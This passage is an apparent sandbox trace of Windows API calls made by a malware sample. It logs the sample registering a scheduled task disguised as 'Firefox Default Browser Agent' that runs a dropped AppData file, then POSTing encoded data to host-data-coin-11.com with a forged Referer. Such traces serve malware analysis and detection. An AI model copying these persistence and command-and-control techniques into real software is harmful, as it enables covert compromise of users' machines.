Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0xfc4fd38 | out: ppvObject=0xfc4fd38*=0x3ce49b0) returned 0x0 [0158.822] IExecAction:put_Path (This=0x3ce49b0, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0158.822] IUnknown:Release (This=0x3ce49b0) returned 0x2 [0158.823] ITaskFolder:RegisterTaskDefinition (in: This=0x3d4d220, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3d026e0, flags=6, UserId=0xfc4fd60*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), password=0xfc4fda0*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), LogonType=3, sddl=0xfc4fd80*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), ppTask=0xfc4fd00 | out: ppTask=0xfc4fd00*=0x3ced660) returned 0x0 [0161.237] IUnknown:Release (This=0x3ce49b0) returned 0x1 [0161.237] IUnknown:Release (This=0x3ce4be0) returned 0x1 [0161.237] TaskScheduler:IUnknown:Release (This=0x3d026e0) returned 0x0 [0161.237] TaskScheduler:IUnknown:Release (This=0x3d4d220) returned 0x0 [0161.237] TaskScheduler:IUnknown:Release (This=0x3d51fc0) returned 0x0 [0161.237] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211e80) returned 0x10d [0161.238] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211e80) returned 1 [0161.238] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x418 [0161.238] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0161.238] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211c60) returned 0x212 [0161.238] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211c60) returned 1 [0161.238] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x221c [0161.238] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0x223c [0161.239] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x26) returned 0x9211840 [0161.239] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x299f5335 [0161.239] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0xc9) returned 0x9211870 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf1346114 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa615b46d [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe407e618 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xec24076c [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaa02a002 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb6c67747 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1bfc655c [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbb79a678 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x230a5f4a [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa83fa2ae [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x207afa22 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa069fce1 [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe5d04d9a [0161.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3e944815 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x46e43709 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b6d50f5 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4a6816e [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc5a22347 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xef05f360 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2ff5eeeb [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x40a6a96e [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf79e97a1 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa51d9baf [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe4fb0942 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd2f38bff [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8aebfc3a [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8e51812b [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x947d1e3b [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfe846251 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe43a5b36 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf578930 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8709b118 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe0a3c95 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1e6a64f0 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x13041930 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8c464410 [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa65587f [0161.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x107337a [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7941b555 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7ad90669 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb5693c02 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x652d47a [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8ef3b1bb [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1fca2f94 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcec3fdfd [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x91f7fded [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x57c74f28 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfb432605 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc308b05 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe3a74148 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe814fd07 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1850eacb [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5ee2c2a9 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x804f9837 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa0d01e11 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xebd47055 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd885d80 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8a560e16 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x581cebe3 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa5f06c7c [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb2fbd1dd [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x855cfea6 [0161.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xed8a4481 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfedc2fb3 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5085924f [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x14116a8b [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1841c7f0 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x178ccaf9 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc1e06ede [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfe2ba99 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x12666d0a [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa398e9c7 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4a51bd76 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x26367fa4 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x53f267ec [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x403333b5 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xda72f4a5 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x70d0862b [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa1039044 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe63d07a7 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2ee1c4d [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xee9b5f93 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb78cc813 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5befa574 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xea2a690a [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x277adad7 [0161.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x20dcce21 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f8fb87d [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2971a55e [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x58f31891 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xebdccafe [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x11fc4fa6 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x75461054 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xeb7bfe6d [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xec20c585 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x72ee33f1 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe2d4633 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9b526240 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x58e42a8d [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x52a17416 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x163b0487 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x397402c3 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf6154ed5 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6c24bb9d [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4fe8a5c7 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1d3462c2 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x52c37823 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfbf0ff5c [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfcb98c41 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdb8ea240 [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf031c79e [0161.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfc62f9cb [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xff4ebdfe [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xea87d14b [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2cd8bcbd [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x29ba7428 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc2341969 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9dc8473f [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x631cc316 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x407e117a [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x12a154cb [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xedecfb1a [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa6587343 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f3cc659 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1aab0af7 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x56730fb9 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f1ea129 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf941c522 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xea29e609 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x86079191 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x82471fee [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8aab8ee1 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8bde14f9 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x42480b5a [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xede2f169 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc63eadb5 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x26e4c097 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdf9554a9 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbf08f5b3 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd44f4e85 [0161.244] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf7812772 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69315870 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa3e1d051 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x23200f73 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1cd51016 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x455f420e [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x58f37170 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe63214ef [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x908dfb44 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1026acf6 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe8e57c41 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb71d534d [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8d1311f4 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8cf064c5 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2607a7a3 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x47dd7679 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdab60a67 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x93d5ddfe [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1af4cf16 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb2c30a65 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x16ade809 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9930e1bc [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xff18da2a [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x981af722 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x39ab3182 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x14cd1ba6 [0161.245] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb6f2e046 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x91cc02a4 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbfc4b201 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbaee5043 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xda8ad738 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b4bc13a [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa4157f4e [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3d418000 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3f72709a [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8687f04 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x667ad9b3 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbd1d3981 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcc792b16 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x61263296 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc8f33286 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x874c29ab [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x245815f6 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5aa8d394 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdc5dec08 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x828aa7ed [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x74888b6 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x597f3a25 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc32336e1 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7c306581 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3d316c49 [0161.246] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8c7997eb [0161.246] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x118) returned 0x9211950 [0161.247] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0161.247] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0161.247] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0161.247] lstrcatA (in: lpString1="", lpString2="Sh9-CNsWaiQde$njal=0/Z>MdeDnv;A?8;'Wh120o#>)FgqtUR]PX`h9RcXX`80y<=Z_1dYtdG^JMk\"?@`p,VS4hq@0kz>f:tdCunPu%mzCsbZOnNTBIa4\"k/9A=yqh^-+]keo&>?5-$O_AZ7JzZr2" | out: lpString1="Sh9-CNsWaiQde$njal=0/Z>MdeDnv;A?8;'Wh120o#>)FgqtUR]PX`h9RcXX`80y<=Z_1dYtdG^JMk\"?@`p,VS4hq@0kz>f:tdCunPu%mzCsbZOnNTBIa4\"k/9A=yqh^-+]keo&>?5-$O_AZ7JzZr2") returned="Sh9-CNsWaiQde$njal=0/Z>MdeDnv;A?8;'Wh120o#>)FgqtUR]PX`h9RcXX`80y<=Z_1dYtdG^JMk\"?@`p,VS4hq@0kz>f:tdCunPu%mzCsbZOnNTBIa4\"k/9A=yqh^-+]keo&>?5-$O_AZ7JzZr2" [0161.247] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10c) returned 0x9211a70 [0161.247] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0161.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9211840, cbMultiByte=30, lpWideCharStr=0x9211a70, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0161.247] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfc4fc18 | out: pProxyConfig=0xfc4fc18) returned 1 [0161.353] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x84af570 [0161.372] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfc4fcd0 | out: lpUrlComponents=0xfc4fcd0) returned 1 [0161.372] WinHttpConnect (hSession=0x84af570, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x84fcb30 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9211b90 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x68) returned 0x9211bb0 [0161.372] WinHttpOpenRequest (hConnect=0x84fcb30, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x4a18280 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x4e) returned 0x9211c20 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x9211c80 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7241de56 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9211da0 [0161.372] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x17) returned 0x9211dc0 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1d36c094 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3fd68b1d [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7a6fedf9 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4495ece0 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7bd23f30 [0161.372] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa853c14e [0161.372] wsprintfW (in: param_1=0x9211c80, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://atrem.org/") returned 39 [0161.373] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211dc0) returned 0x17 [0161.373] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211dc0) returned 1 [0161.373] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211da0) returned 0x12 [0161.373] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211da0) returned 1 [0161.373] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211c20) returned 0x4e [0161.373] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211c20) returned 1 [0161.373] WinHttpAddRequestHeaders (hRequest=0x4a18280, pwszHeaders="Accept: */*\r\nReferer: http://atrem.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0161.373] WinHttpSendRequest (hRequest=0x4a18280, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9211950*, dwOptionalLength=0x10f, dwTotalLength=0x10f, dwContext=0x0) returned 1 [0162.416] WinHttpReceiveResponse (hRequest=0x4a18280, lpReserved=0x0) returned 1 [0162.417] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2800) returned 0x9211da0 [0162.418] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9211da0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x9211da0*, lpdwNumberOfBytesRead=0xfc4fd88*=0x18) returned 1 [0162.436] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9211da0, Size=0x5000) returned 0x92145b0 [0162.437] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x92145c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x92145c8*, lpdwNumberOfBytesRead=0xfc4fd88*=0x0) returned 1 [0162.437] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x470000 [0162.439] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92145b0) returned 1 [0162.439] WinHttpCloseHandle (hInternet=0x4a18280) returned 1 [0162.439] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211c80) returned 0x10d [0162.440] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211c80) returned 1 [0162.440] WinHttpCloseHandle (hInternet=0x84fcb30) returned 1 [0162.440] RtlSizeHeap 